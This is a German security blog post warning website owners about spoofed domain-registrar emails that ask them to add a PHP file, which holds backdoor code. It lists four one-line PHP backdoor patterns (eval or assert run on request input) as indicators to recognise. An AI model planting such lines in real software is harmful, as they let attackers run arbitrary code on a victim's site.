Security Blog
Security Blog
Posted By Gregory

Vertrauen Sie nicht diesen gefälschten Domain-Bestätigungs-E-Mails

Wenn Sie jemals einen Brief jeglicher Art erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren


English version: Do not trust those fake domain confirmation emails


Kürzlich erhielten einige meiner Kunden seltsame E-Mails von ihren Domain-Registraren. Diese enthielten die Aufforderung, ihre Domains zu bestätigen. Ich überprüfte einen dieser Briefe und erkannte ihn schnell als betrügerische Nachricht . Alle Briefe hatten ein identisches Muster und forderten zur Erstellung einer PHP-Datei im Stammverzeichnis einer Website mit einem bestimmten Namen und dem angegebenen Inhalt auf. Der vorgeschlagene Inhalt dieser PHP-Datei enthielt natürlich Schadcode, sogenannten Backdoor-Code. Mit diesem Code kann der Angreifer beliebige Aktionen auf der Website eines Opfers ausführen.

Sollten Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code für Ihre Website zu erstellen, herunterzuladen oder zu installieren, ignorieren Sie ihn bitte. Keine Ausnahmen. Selbst wenn der Brief vom Präsidenten oder Ihrer Mutter kommt.

Betrügerische E-Mails wirken aufgrund der legitimen Absenderadresse echt. Es handelt sich jedoch um E-Mail-Spoofing. Sie erwarten doch nicht, eine gefälschte E-Mail von Ihren Freunden oder Ihrem Domain-Registrar zu erhalten. Stimmt’s? Nein! Jede E-Mail kann jede beliebige Absenderadresse enthalten. Die meisten E-Mail-Server und E-Mail-Clients überprüfen die Absenderadresse nicht. Sie halten sie daher für gesucht. Vertrauen Sie daher keiner E-Mail von einem bekannten Absender, wenn diese eine Aufforderung zu verdächtigen Aktionen enthält, wie etwa die Installation von Code auf Ihrer Website oder einer Anwendung auf Ihrem Computer.

Technische Details

Gefälschte E-Mails enthalten normalerweise einige der folgenden PHP-Zeilen.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Zu Ihrer Information: base64_decode, eval und assert sind bekannte Marker für verdächtigen oder bösartigen PHP-Code.

Siehe auch: Plugin Inspector deckt Sicherheitsprobleme bei anderen Plugins auf


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.